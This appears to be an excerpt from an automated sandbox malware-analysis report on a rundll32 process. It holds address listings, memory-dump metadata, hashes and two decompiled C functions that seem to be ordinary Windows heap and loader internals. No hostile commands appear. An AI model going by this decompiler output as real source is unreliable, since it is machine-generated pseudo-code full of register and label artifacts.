                                                                                                                0x04475991
                                                                                                                0x00000000
                                                                                                                0x0447595d
                                                                                                                0x0447595d
                                                                                                                0x04475963
                                                                                                                0x04475965
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475967
                                                                                                                0x04475967
                                                                                                                0x0447596b
                                                                                                                0x0447596d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0447596f
                                                                                                                0x04475971
                                                                                                                0x04475971
                                                                                                                0x04475974
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475974
                                                                                                                0x00000000
                                                                                                                0x04475967
                                                                                                                0x0447595b
                                                                                                                0x04475942
                                                                                                                0x04475863
                                                                                                                0x04432143
                                                                                                                0x04432143
                                                                                                                0x04432149
                                                                                                                0x0443214f
                                                                                                                0x044322ec
                                                                                                                0x044322f1
                                                                                                                0x044322f6
                                                                                                                0x00000000
                                                                                                                0x044322f6
                                                                                                                0x04432159
                                                                                                                0x04432173
                                                                                                                0x04432173
                                                                                                                0x0443217d
                                                                                                                0x04432181
                                                                                                                0x04432186
                                                                                                                0x044759ae
                                                                                                                0x044759b2
                                                                                                                0x044759b5
                                                                                                                0x044759b7
                                                                                                                0x044759ba
                                                                                                                0x044759cd
                                                                                                                0x044759d1
                                                                                                                0x044759d5
                                                                                                                0x044759d9
                                                                                                                0x044759db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044759dd
                                                                                                                0x044759dd
                                                                                                                0x044759e1
                                                                                                                0x044759e4
                                                                                                                0x044759e7
                                                                                                                0x044759ee
                                                                                                                0x044759ee
                                                                                                                0x044759f3
                                                                                                                0x044759f3
                                                                                                                0x00000000
                                                                                                                0x04432186
                                                                                                                0x04432164
                                                                                                                0x0443216d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443216d
                                                                                                                0x04432106
                                                                                                                0x04432266
                                                                                                                0x044320d8
                                                                                                                0x044320da
                                                                                                                0x044320e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 581000ee33590b98da537784bde523cdd4dcbad7c2c325a95986f80d248c100b
                                                                                                                • Instruction ID: 6c64eb3b6ad94198dad35ca4656158f3fe07dd5067569f689b9c7c908a781031
                                                                                                                • Opcode Fuzzy Hash: 581000ee33590b98da537784bde523cdd4dcbad7c2c325a95986f80d248c100b
                                                                                                                • Instruction Fuzzy Hash: 0AF1C371608341AFEF25CE28C94076BB7E1BB89B15F04895FE9959B381D774F842CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0441849B Relevance: .3, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0441849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x44df9c0);
				E0445D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x44f7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0441CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04422280( *[fs:0x30], 0x44f8550);
						_t139 =  *0x44f7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0443F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0441FFB0(_t193, _t235, 0x44f8550);
								L5:
								return E0445D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04401C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x44f7b9c; // 0x0
							_t235 = L04424620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x44f7b10; // 0x9
								 *(_t237 - 0x4c) = _t150;
								_t193 = E0443A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags, _t237 - 0x58, _t237 - 0x39, _t237 - 0x74);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0441FFB0(_t193, _t235, 0x44f8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L044277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L044277F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x44f7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x44f7b10; // 0x9
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E044437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x44f7b9c; // 0x0
									_t214 = L04424620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E044437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x44f7b10 =  *0x44f7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x44f7b04 =  *0x44f7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L044277F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L044277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x44f7b08 =  *0x44f7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E044457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0444F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L044277F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0443A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L044277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E044496C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                                0x0441849b
                                                                                                                0x0441849b
                                                                                                                0x0441849b
                                                                                                                0x0441849b
                                                                                                                0x0441849d
                                                                                                                0x044184a2
                                                                                                                0x044184a7
                                                                                                                0x044184b1
                                                                                                                0x044184d8
                                                                                                                0x00000000
                                                                                                                0x044184b3
                                                                                                                0x044184c4
                                                                                                                0x044184c9
                                                                                                                0x044184cd
                                                                                                                0x044184cf
                                                                                                                0x044184cf
                                                                                                                0x044184d6
                                                                                                                0x044184e6
                                                                                                                0x044184e9
                                                                                                                0x044184ec
                                                                                                                0x044184ef
                                                                                                                0x044184f2
                                                                                                                0x044184f4
                                                                                                                0x044184fc
                                                                                                                0x04418501
                                                                                                                0x04418506
                                                                                                                0x04418509
                                                                                                                0x044186e0
                                                                                                                0x044186e5
                                                                                                                0x044186e8
                                                                                                                0x044186ed
                                                                                                                0x044186f0
                                                                                                                0x044186f2
                                                                                                                0x04469afd
                                                                                                                0x04469b02
                                                                                                                0x044184da
                                                                                                                0x044184df
                                                                                                                0x044184df
                                                                                                                0x044186fa
                                                                                                                0x044186fd
                                                                                                                0x044186fe
                                                                                                                0x04418701
                                                                                                                0x04418706
                                                                                                                0x04418709
                                                                                                                0x0441870b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04418711
                                                                                                                0x04418725
                                                                                                                0x04418727
                                                                                                                0x0441872a
                                                                                                                0x0441872c
                                                                                                                0x04469af0
                                                                                                                0x04469af5
                                                                                                                0x04418732
                                                                                                                0x04418732
                                                                                                                0x04418732
                                                                                                                0x04418735
                                                                                                                0x04418737
                                                                                                                0x04418515
                                                                                                                0x04418515
                                                                                                                0x04418518
                                                                                                                0x0441851d
                                                                                                                0x04418537
                                                                                                                0x04418539
                                                                                                                0x0441853c
                                                                                                                0x0441853e
                                                                                                                0x0441868c
                                                                                                                0x04418691
                                                                                                                0x04418699
                                                                                                                0x0441869b
                                                                                                                0x04418744
                                                                                                                0x04418748
                                                                                                                0x044186a1
                                                                                                                0x044186a1
                                                                                                                0x044186a1
                                                                                                                0x044186a4
                                                                                                                0x044186a8
                                                                                                                0x04469bdf
                                                                                                                0x04469bdf
                                                                                                                0x044186ae
                                                                                                                0x044186b0
                                                                                                                0x00000000
                                                                                                                0x044186b6
                                                                                                                0x00000000
                                                                                                                0x04469be9
                                                                                                                0x044186b0
                                                                                                                0x04418544
                                                                                                                0x0441854a
                                                                                                                0x0441854d
                                                                                                                0x04418551
                                                                                                                0x0441876e
                                                                                                                0x04418778
                                                                                                                0x0441877b
                                                                                                                0x04418780
                                                                                                                0x04418557
                                                                                                                0x04418557
                                                                                                                0x0441855d
                                                                                                                0x0441855d
                                                                                                                0x0441856b
                                                                                                                0x0441856e
                                                                                                                0x04418570
                                                                                                                0x04418573
                                                                                                                0x04418576
                                                                                                                0x04418576
                                                                                                                0x04418579
                                                                                                                0x0441857b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04418581
                                                                                                                0x044185a0
                                                                                                                0x044185a2
                                                                                                                0x044185a5
                                                                                                                0x044185a7
                                                                                                                0x04469b1b
                                                                                                                0x04469b1b
                                                                                                                0x0441862e
                                                                                                                0x0441862e
                                                                                                                0x04418631
                                                                                                                0x04418631
                                                                                                                0x04418634
                                                                                                                0x04418636
                                                                                                                0x04418669
                                                                                                                0x04418669
                                                                                                                0x0441866b
                                                                                                                0x04469bbf
                                                                                                                0x04469bc4
                                                                                                                0x04469bc8
                                                                                                                0x04469bce
                                                                                                                0x04469bce
                                                                                                                0x04418671
                                                                                                                0x04418671
                                                                                                                0x04418674
                                                                                                                0x04418676
                                                                                                                0x04469bae
                                                                                                                0x04469bae
                                                                                                                0x04418676
                                                                                                                0x0441867c
                                                                                                                0x0441867e
                                                                                                                0x04418688
                                                                                                                0x04418688
                                                                                                                0x00000000
                                                                                                                0x0441867e
                                                                                                                0x04418638
                                                                                                                0x04418638
                                                                                                                0x0441863b
                                                                                                                0x0441863e
                                                                                                                0x0441863f
                                                                                                                0x04418642
                                                                                                                0x04418645
                                                                                                                0x04418648
                                                                                                                0x0441864d
                                                                                                                0x04469b69
                                                                                                                0x04469b6e
                                                                                                                0x04469b7b
                                                                                                                0x04469b81
                                                                                                                0x04469b85
                                                                                                                0x04469b89
                                                                                                                0x04469ba7
                                                                                                                0x04469b8b
                                                                                                                0x04469b91
                                                                                                                0x04469b9a
                                                                                                                0x04469b9f
                                                                                                                0x04469b9f
                                                                                                                0x04418788
                                                                                                                0x0441878d
                                                                                                                0x04418763
                                                                                                                0x04418763
                                                                                                                0x04418766
                                                                                                                0x00000000
                                                                                                                0x04418766
                                                                                                                0x04469b70
                                                                                                                0x00000000
                                                                                                                0x04469b70
                                                                                                                0x04418656
                                                                                                                0x0441865a
                                                                                                                0x0441865c
                                                                                                                0x04418752
                                                                                                                0x04418756
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441875e
                                                                                                                0x00000000
                                                                                                                0x0441875e
                                                                                                                0x04418662
                                                                                                                0x04418662
                                                                                                                0x04418662
                                                                                                                0x04418666
                                                                                                                0x00000000
                                                                                                                0x04418666
                                                                                                                0x044185b7
                                                                                                                0x044185b9
                                                                                                                0x044185bc
                                                                                                                0x044185bf
                                                                                                                0x044185cc
                                                                                                                0x044185d1
                                                                                                                0x044185d4
                                                                                                                0x044185db
                                                                                                                0x044185de
                                                                                                                0x044185e0
                                                                                                                0x04469b5f
                                                                                                                0x00000000
                                                                                                                0x04469b5f
                                                                                                                0x044185e6
                                                                                                                0x044185ea
                                                                                                                0x044186c3
                                                                                                                0x044186c5
                                                                                                                0x044186c8
                                                                                                                0x044186ca
                                                                                                                0x04469b16
                                                                                                                0x00000000
                                                                                                                0x04469b16
                                                                                                                0x044186d6
                                                                                                                0x044185f6
                                                                                                                0x044185f6
                                                                                                                0x044185f9
                                                                                                                0x04418602
                                                                                                                0x04418606
                                                                                                                0x0441860a
                                                                                                                0x0441860b
                                                                                                                0x0441860e
                                                                                                                0x04418611
                                                                                                                0x00000000
                                                                                                                0x04418611
                                                                                                                0x044185f3
                                                                                                                0x00000000
                                                                                                                0x044185f3
                                                                                                                0x04418619
                                                                                                                0x0441861e
                                                                                                                0x0441861e
                                                                                                                0x04418621
                                                                                                                0x04418622
                                                                                                                0x04418623
                                                                                                                0x04418625
                                                                                                                0x0441862c
                                                                                                                0x00000000
                                                                                                                0x0441873d
                                                                                                                0x00000000
                                                                                                                0x0441873d
                                                                                                                0x04418737
                                                                                                                0x0441850f
                                                                                                                0x04418512
                                                                                                                0x00000000
                                                                                                                0x04418512
                                                                                                                0x00000000
                                                                                                                0x044184d6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f097559cbed432dde88e74193fcba4e531406dfe23cdf7699dbdbf86429003eb
                                                                                                                • Instruction ID: 4b755c6e0c55f8fb46e327dc0a8577f347f5306e6a2c60bb1f23cf722734f26f
                                                                                                                • Opcode Fuzzy Hash: f097559cbed432dde88e74193fcba4e531406dfe23cdf7699dbdbf86429003eb
                                                                                                                • Instruction Fuzzy Hash: 46B13AB0E00209DFEF24EF99C984AAEBBB5FF45708F10452AE405AB355E774B946CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443513A Relevance: .3, Instructions: 258COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0443513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x44fd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0444D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04422280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04424620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0444F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0441FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x44fb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0444B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                                0x04435142
                                                                                                                0x0443514c
                                                                                                                0x04435150
                                                                                                                0x04435157
                                                                                                                0x04435159
                                                                                                                0x0443515e
                                                                                                                0x04435165
                                                                                                                0x04435169
                                                                                                                0x0443516c
                                                                                                                0x04435172
                                                                                                                0x04435176
                                                                                                                0x0443517a
                                                                                                                0x0443517a
                                                                                                                0x0443517a
                                                                                                                0x0443517f
                                                                                                                0x04476d8b
                                                                                                                0x04476d8e
                                                                                                                0x04476d91
                                                                                                                0x04476d95
                                                                                                                0x04476d98
                                                                                                                0x04476d9c
                                                                                                                0x04476da0
                                                                                                                0x04476da3
                                                                                                                0x04476da7
                                                                                                                0x04476e26
                                                                                                                0x04476e26
                                                                                                                0x04476e2a
                                                                                                                0x044351f9
                                                                                                                0x044351f9
                                                                                                                0x044351fe
                                                                                                                0x04476e33
                                                                                                                0x04476e33
                                                                                                                0x04476e39
                                                                                                                0x04476e3d
                                                                                                                0x04476e46
                                                                                                                0x04476e50
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476e52
                                                                                                                0x04476e53
                                                                                                                0x04476e56
                                                                                                                0x04476e5d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476e5f
                                                                                                                0x04476e67
                                                                                                                0x04476e77
                                                                                                                0x04476e7f
                                                                                                                0x04476e80
                                                                                                                0x04476e88
                                                                                                                0x04476e90
                                                                                                                0x04476e9f
                                                                                                                0x04476ea5
                                                                                                                0x04476ea9
                                                                                                                0x04476eb1
                                                                                                                0x04476ebf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476ecf
                                                                                                                0x04476ed3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476edb
                                                                                                                0x04476ede
                                                                                                                0x04476ee1
                                                                                                                0x04476ee8
                                                                                                                0x04476eeb
